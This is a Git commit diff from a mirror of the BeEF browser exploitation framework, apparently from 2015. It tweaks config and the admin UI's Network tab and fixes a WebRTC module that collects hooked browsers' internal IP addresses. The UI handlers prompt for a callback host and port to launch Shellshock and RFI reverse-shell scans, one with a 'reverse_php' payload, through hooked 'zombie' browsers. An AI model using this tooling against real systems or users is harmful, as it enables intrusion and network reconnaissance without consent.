Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Fixed a bug in WebRTC command module, prevented duplicates in NetworkHost db table, removed unnecessary code.

Browse Source
This commit is contained in:
antisnatchor
2015-02-05 12:35:23 +01:00
parent 5fc1294ca1
commit 944ba747da
7 changed files with 153 additions and 152 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
Gemfile
View File

@@ -41,7 +41,7 @@ gem "msfrpc-client" # Metasploit Integration extension
gem "rubyzip", ">= 1.0.0"
gem "rubydns", "0.7.0" # DNS extension
gem "geoip" # geolocation support
gem "dm-serializer" # network extension
gem "dm-serializer" # network extension
# For running unit tests
if ENV['BEEF_TEST']

4
config.yaml
View File

@@ -10,7 +10,7 @@ beef:
# More verbose messages (server-side)
debug: false
# More verbose messages (client-side)
client_debug: false
client_debug: true
# Used for generating secure tokens
crypto_default_value_length: 80
@@ -33,7 +33,7 @@ beef:
# NOTE: A poll timeout of less than 5,000 (ms) might impact performance
# when hooking lots of browsers (50+).
# Enabling WebSockets is generally better (beef.websocket.enable)
xhr_poll_timeout: 5000
xhr_poll_timeout: 1000
# Reverse Proxy / NAT
# If BeEF is running behind a reverse proxy or NAT

267
extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js
View File

@@ -30,8 +30,8 @@ ZombieTab_Network = function(zombie) {
commands_statusbar.update_fail("Error getting module id for '"+mod_name+"'");
}
});
return id;
}
return id;
};
/*
* The panel that displays all identified network services grouped by host
@@ -756,8 +756,6 @@ ZombieTab_Network = function(zombie) {
sortInfo: {field: 'ip', direction: 'ASC'}
});
var req_pagesize = 50;
var services_panel_bbar = new Ext.PagingToolbar({
pageSize: req_pagesize,
store: services_panel_store,
@@ -811,131 +809,144 @@ ZombieTab_Network = function(zombie) {
var ip = record.get('ip');
var port = record.get('port');
var proto = record.get('proto');
grid.rowCtxMenu = new Ext.menu.Menu({
items: [{
text: 'Scan ('+ip+':'+port+'/'+proto+')',
iconCls: 'network-host-ctxMenu-host',
menu: {
xtype: 'menu',
items: [{
text: 'Fingerprint HTTP',
iconCls: 'network-host-ctxMenu-fingerprint',
handler: function() {
var mod_id = get_module_id("internal_network_fingerprinting");
commands_statusbar.update_sending('Fingerprinting ' + ip + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip+'-'+ip, "ports":port}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error sending command');
}
});
}
},{
text: 'CORS Scan',
iconCls: 'network-host-ctxMenu-cors',
handler: function() {
var mod_id = get_module_id("cross_origin_scanner");
commands_statusbar.update_sending('CORS scanning ' + ip + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip+'-'+ip, "ports":port}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error sending command');
}
});
}
},{
text: 'Shellshock Scan',
iconCls: 'network-host-ctxMenu-shellshock',
handler: function() {
var mod_id = get_module_id("shell_shock_scanner");
var lhost = prompt("Enter local IP for connect back shell:", 'LHOST');
if (!lhost) {
commands_statusbar.update_fail('Cancelled');
return;
}
var lport = prompt("Enter local port for connect back shell:", 'LPORT');
if (!lport) {
commands_statusbar.update_fail('Cancelled');
return;
}
alert("Now start your reverse shell handler on " + lhost + ':' + lport);
commands_statusbar.update_sending('Shellshock scanning ' + ip + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"rproto":proto, "rhost":ip, "rport":port, "lhost":lhost, "lport":lport}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error sending command');
}
});
}
},{
text: 'RFI Scan',
iconCls: 'network-host-ctxMenu-php',
handler: function() {
var mod_id = get_module_id("rfi_scanner");
var lhost = prompt("Enter local IP for connect back shell:", 'LHOST');
if (!lhost) {
commands_statusbar.update_fail('Cancelled');
return;
}
var lport = prompt("Enter local port for connect back shell:", 'LPORT');
if (!lport) {
commands_statusbar.update_fail('Cancelled');
return;
}
alert("Now start your reverse shell handler on " + lhost + ':' + lport);
commands_statusbar.update_sending('Shellshock scanning ' + ip + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"rproto":proto, "rhost":ip, "rport":port, "lhost":lhost, "lport":lport, "payload":"reverse_php"}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error sending command');
}
});
}
}]
}
}]
});
grid.rowCtxMenu.showAt(e.getXY());
grid.rowCtxMenu = new Ext.menu.Menu({
items: [{
text: 'Scan (' + ip + ':' + port + '/' + proto + ')',
iconCls: 'network-host-ctxMenu-host',
menu: {
xtype: 'menu',
items: [{
text: 'Fingerprint HTTP',
iconCls: 'network-host-ctxMenu-fingerprint',
handler: function () {
var mod_id = get_module_id("internal_network_fingerprinting");
commands_statusbar.update_sending('Fingerprinting ' + ip + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange": ip + '-' + ip, "ports": port}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function (data) {
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function () {
commands_statusbar.update_fail('Error sending command');
}
});
}
}, {
text: 'CORS Scan',
iconCls: 'network-host-ctxMenu-cors',
handler: function () {
var mod_id = get_module_id("cross_origin_scanner");
commands_statusbar.update_sending('CORS scanning ' + ip + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange": ip + '-' + ip, "ports": port}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function (data) {
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function () {
commands_statusbar.update_fail('Error sending command');
}
});
}
}, {
text: 'Shellshock Scan',
iconCls: 'network-host-ctxMenu-shellshock',
handler: function () {
var mod_id = get_module_id("shell_shock_scanner");
var lhost = prompt("Enter local IP for connect back shell:", 'LHOST');
if (!lhost) {
commands_statusbar.update_fail('Cancelled');
return;
}
var lport = prompt("Enter local port for connect back shell:", 'LPORT');
if (!lport) {
commands_statusbar.update_fail('Cancelled');
return;
}
alert("Now start your reverse shell handler on " + lhost + ':' + lport);
commands_statusbar.update_sending('Shellshock scanning ' + ip + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({
"rproto": proto,
"rhost": ip,
"rport": port,
"lhost": lhost,
"lport": lport
}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function (data) {
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function () {
commands_statusbar.update_fail('Error sending command');
}
});
}
}, {
text: 'RFI Scan',
iconCls: 'network-host-ctxMenu-php',
handler: function () {
var mod_id = get_module_id("rfi_scanner");
var lhost = prompt("Enter local IP for connect back shell:", 'LHOST');
if (!lhost) {
commands_statusbar.update_fail('Cancelled');
return;
}
var lport = prompt("Enter local port for connect back shell:", 'LPORT');
if (!lport) {
commands_statusbar.update_fail('Cancelled');
return;
}
alert("Now start your reverse shell handler on " + lhost + ':' + lport);
commands_statusbar.update_sending('Shellshock scanning ' + ip + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({
"rproto": proto,
"rhost": ip,
"rport": port,
"lhost": lhost,
"lport": lport,
"payload": "reverse_php"
}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function (data) {
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function () {
commands_statusbar.update_fail('Error sending command');
}
});
}
}]
}
}]
});
grid.rowCtxMenu.showAt(e.getXY());
},
afterrender: function(datagrid) {
datagrid.store.reload({ params: {nonce: Ext.get ("nonce").dom.value} });
}
afterrender: function (datagrid) {
datagrid.store.reload({params: {nonce: Ext.get("nonce").dom.value}});
}
}
});

2
extensions/network/extension.rb
View File

@@ -17,11 +17,9 @@ end
end
end
require 'extensions/network/network'
require 'extensions/network/models/network_host'
require 'extensions/network/models/network_service'
require 'extensions/network/api'
require 'extensions/network/rest/network'
require 'dm-serializer'

13
extensions/network/network.rb
View File

@@ -1,13 +0,0 @@
#
# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module Network
end
end
end

9
modules/host/get_internal_ip_webrtc/command.js
View File

@@ -22,7 +22,10 @@ beef.execute(function() {
// Upon an ICE candidate being found
// Grep the SDP data for IP address data
rtc.onicecandidate = function (evt) {
if (evt.candidate) grepSDP(evt.candidate.candidate);
if (evt.candidate){
console.log("a="+evt.candidate.candidate);
grepSDP("a="+evt.candidate.candidate);
}
};
// Create an SDP offer
@@ -30,12 +33,12 @@ beef.execute(function() {
grepSDP(offerDesc.sdp);
rtc.setLocalDescription(offerDesc);
}, function (e) { beef.net.send('<%= @command_url %>', <%= @command_id %>, "SDP Offer Failed"); });
function processIPs(newAddr) {
if (newAddr in addrs) return;
else addrs[newAddr] = true;
var displayAddrs = Object.keys(addrs).filter(function (k) { return addrs[k]; });
beef.debug("Found IPs: "+ displayAddrs.join(","))
beef.debug("Found IPs: "+ displayAddrs.join(","))
beef.net.send('<%= @command_url %>', <%= @command_id %>, "IP is " + displayAddrs.join(","));
}

8
modules/host/get_internal_ip_webrtc/module.rb
View File

@@ -25,9 +25,11 @@ class Get_internal_ip_webrtc < BeEF::Core::Command
next unless ip =~ /^[\d\.]+$/
next if ip =~ /^0\.0\.0\.0$/
next unless BeEF::Filters.is_valid_ip?(ip)
print_debug("Hooked browser has network interface #{ip}")
r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :os => os, :cid => cid)
r.save
if BeEF::Core::Models::NetworkHost.all(:ip => ip).empty? # prevent duplicates
print_debug("Hooked browser has network interface #{ip}")
r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :os => os, :cid => cid)
r.save
end
end
end
end